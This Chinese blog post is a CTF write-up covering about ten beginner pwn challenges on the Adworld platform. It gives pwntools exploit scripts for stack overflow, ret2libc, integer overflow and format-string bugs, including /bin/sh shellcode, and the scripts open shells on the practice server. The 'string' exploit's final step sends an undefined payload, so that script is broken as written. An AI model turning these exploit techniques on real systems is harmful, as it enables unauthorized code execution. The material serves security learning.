攻防世界新手pwn题writeup

最新推荐文章于 2023-10-02 22:35:36 发布
最新推荐文章于 2023-10-02 22:35:36 发布
阅读量1.6k 收藏 4
点赞数
文章标签: 安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/thinker11/article/details/104101205
版权

level2

1.查壳

在这里插入图片描述

2.IDA分析

在这里插入图片描述
进入vulnerable_function函数

在这里插入图片描述
读入的值明显大于buf自身的大小

又有system函数,就差/bin/sh了

接下来我们

SHIFT+F12

在这里插入图片描述

双击system函数,得到地址 0x8048320

双击binsh,得到地址 0x0804a024

双击buf,得到buf到返回地址的偏移 0x88+4=140

3.EXP

from pwn import *
p=remote('111.198.29.45',53371)
sys_addr=0x8048320
binsh_addr=0x0804a024
payload='a'*140+p32(sys_addr)+'a'*4+p32(binsh_addr)
p.recvuntil("Input:")
p.sendline(payload)
p.interactive()

4.Flag

在这里插入图片描述

guess_num

1.查壳

在这里插入图片描述

2.ida分析

在这里插入图片描述gets函数存在栈溢出漏洞,再看一下有没有值得注意的

在这里插入图片描述sub_C3E中有我们想要的东西,

最开始的想法肯定是通过溢出,跳转到sub_C3E的位置,直接执行cat flag

但是发现不可行,因为中间有个seed,所以我们需要通过溢出漏洞,覆盖seed得到一个已知的种子,使程序运行到sub_C3E那里

双击v8得到v8到seed的距离0x20

通过ldd guess_num得到共享文件:/lib/x86_64-linux-gnu/libc.so.6

在这里插入图片描述

3.EXP

from pwn import *
from ctypes import *
p=remote('111.198.29.45',57730)
elf=ELF('./guess_num')
libc=cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
payload='a'*0x20+p64(1)
p.recvuntil('name:')
p.sendline(payload)
libc.srand(1)
for i in range(10):
	num=str(libc.rand()%6+1)
	p.recvuntil('number:')
	p.sendline(num)
p.interactive()

4.Flag

在这里插入图片描述

int_overflow

一看名字就知道这是一道整数溢出的题目

1.查壳

在这里插入图片描述

2.ida分析

在这里插入图片描述没什么亮点,进入login函数看看

在这里插入图片描述没什么亮点,进入check_passwd函数
在这里插入图片描述strcpy那里是个漏洞,

whats_this函数那里有我们想要的
在这里插入图片描述
要想执行strcpy函数,我们必须要使v3大于3,小于等于8,不过v3是个无符号整型,八位寄存器对于无符号整数来说是有0~255的范围的,所以我们构造255个字符,就能构成溢出,而返回地址占4个字节,所以是259
在这里插入图片描述

从这里可以看出passwd的保存为0x14,溢出,然后跳转到system函数那里,我们就能够得到flag

3.EXP

from pwn import *
p=remote('111.198.29.45',53086)
flag_addr=0x804868b
p.recvuntil('choice:')
p.sendline('1')
p.recvuntil("Please input your username:\n")
p.sendline('kk')
payload='a'*0x14+'aaaa'+p32(flag_addr)
payload=payload.ljust(262,'a')
p.recvuntil("passwd:\n")
p.sendline(payload)
p.interactive()

4.Flag

在这里插入图片描述

cgpwn2

1.查壳

在这里插入图片描述

2.ida分析

在这里插入图片描述
进入hello函数
在这里插入图片描述gets函数栈溢出漏洞
在这里插入图片描述

存在system函数,但是没有binsh字符串

又看到fgets函数,

思路有了,我们可以通过fgets函数将binsh字符串传入name里面,

然后通过栈溢出漏洞覆盖返回地址,最后调用system函数和name

system函数的地址:0x8048420

name函数的地址:0x804a080

s到返回地址的偏移 :0x26+4=42

3.EXP

from pwn import *
p=remote('111.198.29.45',58337)
sys_addr=0x8048420
name_addr=0x804a080
p.recvuntil("\n")
p.sendline('/bin/sh')
payload='a'*42+p32(sys_addr)+'aaaa'+p32(name_addr)
p.recvuntil("\n")
p.sendline(payload)
p.interactive()

4.Flag

在这里插入图片描述

when_did_you_born

1.查壳

在这里插入图片描述

2.IDA分析

在这里插入图片描述我们只需要让程序执行system(“cat flag”)即可

发现gets漏洞函数,思路有了,先让v5不等于1926然后通过gets函数覆盖v5为1926,就可以的到flag

v4到v5的距离为:0x20-0x18=8

3.EXP

from pwn import *
p=remote('111.198.29.45',47153)
p.recvuntil("What's Your Birth?")
p.sendline("1927")
payload='a'*8+p64(1926)
p.recvuntil("What's Your Name?")
p.sendline(payload)
p.interactive()

4.Flag

在这里插入图片描述

hello_pwn

1.查壳

在这里插入图片描述

2.IDA分析

在这里插入图片描述

read函数存在栈溢出漏洞,

进入sub_400686函数中

在这里插入图片描述

我们通过read函数覆盖dword_60106c为1853186401,就能得到flag

两个函数的偏移为0x601068-0x60106C=4

3.EXP

from pwn import *
p=remote('111.198.29.45',41777)
payload='a'*4+p64(1853186401)
p.recvuntil("lets get helloworld for bof")
p.sendline(payload)
p.interactive()

4.Flag

在这里插入图片描述

level3

文件打开之后还是个压缩包,改文件格式为zip

1.查壳

在这里插入图片描述

2.IDA分析

在这里插入图片描述

在这里插入图片描述

read函数栈溢出漏洞,这道题没有system函数也没有/bin/sh,但是给了我们一个共享文件,所以这是一道ret2libc的题目

我们可以泄露write函数的真实地址

buf到返回地址的偏移为140

3.EXP

通过ROPgadget --binary libc_32.so.6 --string '/bin/sh'获得libc中的binsh字符串的地址

在这里插入图片描述

from pwn import *
p=remote('111.198.29.45',57663)
elf=ELF('./level3')
libc=ELF('./libc_32.so.6')
write_plt=elf.plt['write']
main_plt=elf.symbols['main']
write_got=elf.got['write']
payload1='a'*140+p32(write_plt)+p32(main_plt)+p32(1)+p32(write_got)+p32(4)
p.recvuntil("Input:\n")
p.sendline(payload1)
write_addr=u32(p.recv()[:4])
libcbase=write_addr-libc.symbols['write']
sys_addr=libcbase+libc.symbols['system']
libc_binsh_addr=0x0015902b
binsh_addr=libcbase+libc_binsh_addr
payload='a'*140+p32(sys_addr)+'aaaa'+p32(binsh_addr)
p.sendline(payload)
p.interactive()

4.Flag

在这里插入图片描述

string

1.查壳

在这里插入图片描述

2.IDA分析

在这里插入图片描述我们可以得到v4的地址

在这里插入图片描述没啥亮点

在这里插入图片描述在这里插入图片描述printf函数存在格式化字符串漏洞

在这里插入图片描述

read函数下面可以把输入的字符串当作指令执行,我们可以写入shellcode

但是要求是a1==a1[1],往上回溯,我们查到分别是v3和v3[1],但是两个值,一个是68,一个是85.

sub_400bb9函数中格式化字符串漏洞,我们可以利用那个漏洞将v3的值改为85

而v3的地址程序中已经告诉我们了,即v4的地址0xb21260

3.EXP

八位寄存器对于无符号整数来说是有0~255的范围的。
在64位程序运行中,参数传递需要寄存器。
64位参数传递约定:前六个参数按顺序存储在寄存器rdi,rsi,rdx,rcx,r8,r9中,
参数超过六个时,从第七个开始压入栈中

from pwn import *
p=remote('111.198.29.45',43616)
p.recvuntil("sercet[0] is")
v3_addr=int(p.recvuntil("\n")[:-1],16)
p.sendlineafter("What should your character's name be:",'123')
p.sendlineafter("So,where you will go?east or up?:",'east')
p.sendlineafter("go into there(1),or leave(0)?:",'1')
p.sendlineafter("'Give me an address'",str(v3_addr))
p.sendlineafter("And,you wish is:",'%85c%7$n')
context(os='linux',arch='amd64')
shellcode="\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
p.recvuntil("USE YOU SPELL")
p.sendline(payload)
p.interactive()

4.Flag

在这里插入图片描述

get_shell

1.查壳

在这里插入图片描述

2.IDA分析

在这里插入图片描述

3.EXP

nc 111.198.29.45 46953

4.Flag

在这里插入图片描述

CGfsb

1.查壳

在这里插入图片描述

2.IDA分析

在这里插入图片描述

printf函数存在格式化字符串漏洞,通过漏洞使pwnme=8,就能得到flag

这里我们用gdb算偏移

chmod 777 cg

gdb ./cg

b * 0x80486cd下断点
在这里插入图片描述

x/16x $esp

在这里插入图片描述
偏移为10

3.EXP

理解:fmtstr_payload(偏移,{key内存地址,value值})

第一个参数表示格式化字符串的偏移;

第二个参数表示需要利用%n写入的数据,采用字典形;

第三个参数表示已经输出的字符个数,这里没有,为0,采用默认值即可;

第四个参数表示写入方式,是按字节(byte)、按双字节(short)还是按四字节(int),对应着hhn、hn和n,默认值是byte,即按hhn写。

from pwn import *
p=remote('111.198.29.45',47218)
pwnme=0x0804a068
#payload=p32(pwnme)+'aaaa%10$n'
payload=fmtstr_payload(10,{pwnme:8})
p.recvuntil("your name:\n")
p.sendline('aaa')
p.recvuntil("message please:\n")
p.sendline(payload)
p.interactive()

4.Flag

在这里插入图片描述

我自己的公众号
在这里插入图片描述

Hacker Snownman
关注
攻防世界 pwn练习区解法 write up
qq_46441427的博客
02-16 870
checksec stack: canary found 是指运行程序时,会把canary取出放入一个rbp定向的值,在退出函数前将rbp定向的值和canary的值进行一个比较(异或一下,看是不是0),如果不相等,则运行_stack_chk_fail函数 NX 数据所在的内存为不可执行,程序溢出转为shellcode时,程序会去在数据页面上执行指令,这个时候CPU抛出异常,不会让它执行 PIE 程序装在随机的地址 ASLR 即使文件开启了PIE保护,还需要开启ASLR才会真正打乱基址 ...
格式化字符串漏洞入门简述(含例子:攻防世界pwn新手GCfsb)
ins_Digger的博客
10-30 1115
##本文参考的文章有如下的博客(实在太菜,所以花了好长时间去练习,找,看博客才稍微有一点点明白,其实还是不是特别明白) https://www.freebuf.com/column/207425.html 《黑客攻防技术宝典:系统篇》第四章 格式化字符串漏洞的简单概述 学过 c 语言应该就会知道printf()函数的使用方法,如下图: int main(){ char str[100]; s...
pwn栈溢出10道练习writeup
01-04
pwn栈溢出练习题目,每都有writeup.
攻防世界-pwn1-Writeup
SkYe's Blog
05-13 440
pwn1 考点:栈溢出,canary绕过 基本情况 程序实现功能是往栈上读写数据。 保护措施 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) 栈溢出 ...... while ( 1 ) { menu(); v3 = my_input(); switch ( v3 ) {
攻防世界新手pwn writeup
09-08 262
CGfsb 题目地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5050 下载文件后,使用file命令查看。 32位的文件,用ida打开,F5查看伪代码。 printf漏洞:https://www.cnblogs.com/cfans1993/articles...
攻防世界pwn新手writeup
a370793934的专栏
11-27 1059
get_shell #coding = utf-8 from pwn import * context.log_level = 'debug' io = remote('111.198.29.45', 54766) io.sendline('ls') io.sendline('cat flag') io.interactive() flag: cyberpeace{c2b358...
攻防世界 pwn进阶区解法 write up(一)
qq_46441427的博客
03-01 418
实时数据监测 找信息 没有发现canary,没有开启PIE和NX 查看ida 发现有一个printf,这里是fgets,可能会用到格式化字符串漏洞,运行一下程序 结合ida的分析我们可知,要把这个值改成0x2223322,那结合之前的printf,可以确定是格式化字符串漏洞 给了我们地址,那我们的payload就以地址为开头,因为是p32,所以后面35795746要减4,构成%35795742d%偏移量n$ 然后确定偏移量: 总共,从A到41包括A有12个,偏移量=12 所以得到payload
攻防世界pwn新手练习(CGfsb)
BurYiA的博客
09-15 1756
CGfsb ok,按照惯例,拿到程序后先扔到Linux下查一下基本信息 32位程序,开了NX(堆栈不可执行)以及CANNARY(栈保护) 貌似有一丝丝头疼嗷,咱们运行一下,看看它的程序逻辑 唔,是一个留言板,可以输入的地方有两处,一处是名字,一处是留言内容。ok,可以扔进IDA分析了。 F5后直接看程序伪代码 很明显,我们需要让pwnme这个变量的值等于8,然后便可以拿到flag文件中的东西,...
dice_game [XCTF-PWN][高手进阶区]CTF writeup攻防世界解系列12
重新启程
12-23 1829
题目地址:dice_game 从这篇开始就正式进入高手进阶区,一些简单的知识点我这里就不会再重复赘述了,请有需要的同学看前面的章节。 废话不多,看看题目 题目没什么提示,只是知道这个题目的来源是:XCTF 4th-QCTF-2018 下载附件,看看情况,照例做下保护机制检查 root@mypwn:/ctf/work/python/dice_game# checksec dice_g...
攻防世界 pwn进阶区 pwn-200
Kni9hT's Blog
03-04 1755
前言 一到夜晚就不太想睡…想了想还是把昨天(不,前天 )的那pwn writeup写了吧。虚假の二进制选手终于捡起了他的pwn…话说从web新手区转到pwn进阶区,wtnl。 学习要点 DynELF的使用 plt地址和got地址的区别 如何利用write函数 思考 题目的逻辑不难,开启了NX防护(即不能直接执行栈上的数据,通常使用ROP,本就是),没有给libc地址,有个明显的栈溢出漏...
PWN测试题目
07-18
信息安全PWN测试题目:用于CTF的练习与PWN的学习,测试题目
pwnwriteup(后续更新)
weixin_43342135的博客
08-12 1241
bugku的pwn1: 这道没啥说的, 直接在linu下执行语句:nc 114.116.54.89 10001, 再 ls 命令展示当下目录, 然后 cat flag 读取目标文件, 一般来说是flag这个文件有flag,但是也不排除其它的地方有flag。 Bugku的pwn2: 第一步先nc上去程序,然后观看程序的作用。 传文件进入linux,再然后file pwn2,che...
PWN 基础篇 Write Up
最新发布
qq_61553520的博客
10-02 572
data 信息第一句定义了一个名为_data的数据段。segment关键字用于声明一个新的段,dword表示每个数据元素的大小为 4 字节,public表示该段可以在其他模块中访问,'DATA'是标识符,用于标识数据段。第二句则是将代码段(.text)的默认段寄存器cs和数据段(.data)的_data段寄存器进行关联。assume关键字用于指定段寄存器与段的关系,在这里它指定了cs寄存器与_data段寄存器的关联。通过这两句指令,我们可以确保在程序运行时,使用cs寄存器来访问_data段。
攻防世界PWN新手(PWN——level2)
0pt1mus
12-20 918
level2 转载自原创superj.site 0x00 首先通过file和checksec分析该的附件。 判断该文件是32位的ELF文件,只开启了不可执行的保护。 0x01 开始进行反汇编,用IDA 32位。 通过左侧的函数窗口发现,只有main、vulnerable_function可用,因此进行分析,两个函数如下图: 通过分析发现,在main函数中首先调用vulnerable_fun...
攻防世界pwn新手wp(通俗易懂)
njh18790816639的博客
03-10 1932
get_shell 这道先看看附件,探查一下信息,再用ida打开,就可以发现伪代码其实很简单的: 然后在远程连接这个端口进行攻击了。 并且我们能看到它的大致防护信息,然后来个脚本: 此时就可以进行攻击了。 这样子flag就拿到了。 CGfsb 刚开始先在windows里进行一番静态调试: 大概的知道了一些漏洞,和一点信息,我们就可以进行破解了。 ...
攻防世界pwn新手解-level3
weixin_62621015的博客
04-17 1167
攻防世界pwn-level3详细解。
NCTF2019 -- PWN部分writeup
qq_41988448的博客
11-27 1296
easy_rop 链接:https://pan.baidu.com/s/1ohXfpbiIb3jjHpYtcuS9xA 提取码:lz3e 文件防护 反汇编 调试的时候发现main函数的rbp居然是pie,而返回地址下面第四行是main函数自己的头部指针 已知条件 存在栈溢出,大小为4个栈单元 开启了canary保护,可以用’+'号绕过 main函数的 rbp 为 pie(基址) main函...
buuoj Pwn writeup 126-130
yongbaoii的博客
05-11 308
126 护网杯_2018_gettingstart 保护 程序就这么点,逻辑也简单。 然后有个栈溢出。 然后就修改修改就好了嘛,把v7改成0x7fffffffffffffff,v8改成0.1 exp from pwn import* r = remote("node3.buuoj.cn", 28793) #r = process("./126") payload = 'a' * 0x18 + p64(0x7fffffffffffffff) + p64(0x3FB999999999999A) r.re
buuoj Pwn writeup 151-155
yongbaoii的博客
05-28 404
151 ciscn_2019_sw_1 保护 要注意到的是RELRO一点没开,这意味着.fini_array是可以覆盖的。 栈上的格式化字符串。 system也有了。 printf只能用一次,但是我们前面说.fini_array可以覆盖,所以我们第一次先覆盖它为main,制造循环,然后劫持scanf的got表,进行利用就好。 要注意的是在我们覆盖.fini_array的意思是在返回的时候以此调用里面的函数,而这个.fini_array数组只有一个数组,所以我们只能通过它来返回一次main函数,所以我们一
攻防世界pwn新手答案
08-10
回答: 对于攻防世界pwn新手,其中一个关键是要修改全局变量pwnme的内容。通过格式化字符串的方法,可以实现这个目标。格式化字符串的原理是利用输入的格式化字符串,修改内存中的指定位置的值。具体的方法可以参考CTF-wiki上对格式化字符串的总结。另外,还可以利用栈溢出漏洞来实现攻击。栈溢出漏洞的原理是当输入的数据超过了栈的缓冲区大小时,会覆盖到相邻的内存区域,包括函数返回地址等重要信息。通过溢出覆盖system函数的参数为"/bin/sh",就可以获取到shell权限。在IDA32中,可以通过查看字符串窗口,找到可以直接利用的字符串,比如system和/bin/sh。这样就可以猜测需要溢出覆盖system函数的参数,实现获取shell的目的。123 #### 引用[.reference_title] - *1* *2* [xctf攻防世界pwn基础解(新手食用)](https://blog.csdn.net/lplp9822/article/details/89735167)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *3* [攻防世界 pwn 二进制漏洞简单练习区 答(1-10解)](https://blog.csdn.net/qq_33957603/article/details/122450397)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值